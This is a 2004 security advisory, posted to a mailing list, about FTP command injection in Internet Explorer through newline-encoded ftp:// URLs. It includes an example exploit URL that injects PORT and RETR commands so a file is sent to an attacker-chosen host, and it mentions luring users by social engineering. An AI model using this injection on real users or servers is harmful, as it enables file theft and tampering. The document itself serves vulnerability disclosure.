Date: Tue, 7 Dec 2004 04:19:36 +0100
From: Albert Puigsech Galicia <ripe@7a69ezine.org.>
To: [email protected]Subject: 7a69Adv#15 - Internet Explorer FTP command injection
--nextPart2463178.N37ZH6cKFO
Content-Type: text/plain;
charset="us-ascii"
Content-Transfer-Encoding: quoted-printable
Content-Disposition: inline
=2D ------------------------------------------------------------------
7a69ezine Advisories 7a69Adv#15
=2D ------------------------------------------------------------------
http://www.7a69ezine.org [05/12/2004]
=2D ------------------------------------------------------------------
Title: Internet Explorer FTP command injection
Author: Albert Puigsech Galicia - <ripe@7a69ezine.org.>
Software: Microsoft Internet Explorer
Versions: >=3D 6.0.2800.1106
Remote: yes
Exploit: yes
Severity: Low-Medium
=2D ------------------------------------------------------------------
I. Introduction.
Internet Explorer is a well-known HTTP browser, and like others it can use=
=20
more protocols, for example FTP. The security historial of this navigator i=
s=20
really cool and we are glad for the excelent work done by Microsoft. We lov=
e=20
your (in)security features.
II. Description.
In order to access to a server FTP using Internet Explorer you write=20
"ftp://ftpuser:ftppass@server/directory" in the directions's bar and then t=
he=20
navigator connects to the server and executes the following commands (and=20
other that have omitted because they are not important for this stuff).
USER ftpuser
PASS ftppass
CWD /directory/
The security problem resides in which is posible to inject FTP commands on=
=20
the URL adding at the code %0a followed by your injected commands. If you d=
o=20
"ftp://ftpuser:ftppass@server/directory%0asomecommand%0a" it will execute=20
those commands.
USER ftpuser
PASS ftppass
CWD /directory
somecommand
The last line is an erroneous command, but it's not a problem because=20
'somecommand' has already been executed.
III. Exploit
You need to deceive a user to go to your URL and then to introduce a valid=
=20
user and password. So yes! The explotation also requires to apply social=20
engineering. Then you can do a lot of things using this bug like create or=
=20
delete files and directories, but probably, the most interesting thing is t=
o=20
download files. Its posible to do that using this URL;
ftp://server/%0aPORT%20a,b,c,d,e,f%0aRETR%20/file
Then the server will connect to a.b.c.d and port e,f (see FTP RFC to=20
translate the port number) and will send the file data.
IV. Patch
Internet Explorer sucks a lot, just turn to Firefox World.
V. Timeline
01/12/2004 - Bug discovered on konqueror browser
03/12/2004 - Tried in IE. Also afected!
05/12/2004 - Advisor released
VI. Extra data
You can find more 7a69ezine advisories on this following link:
http://www.7a69ezine.org/avisos/propios [spanish info]
--nextPart2463178.N37ZH6cKFO
Content-Type: application/pgp-signature
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.2.6 (GNU/Linux)
iD8DBQBBtSFNVLMpEcDCGUcRAqXXAJ9Wx24rjhkWEFmIJQAUrk086NcMvQCgm3iv
ebWa1PihQGK7tW2O1HNJwAk=
=uKtL
-----END PGP SIGNATURE-----
--nextPart2463178.N37ZH6cKFO--
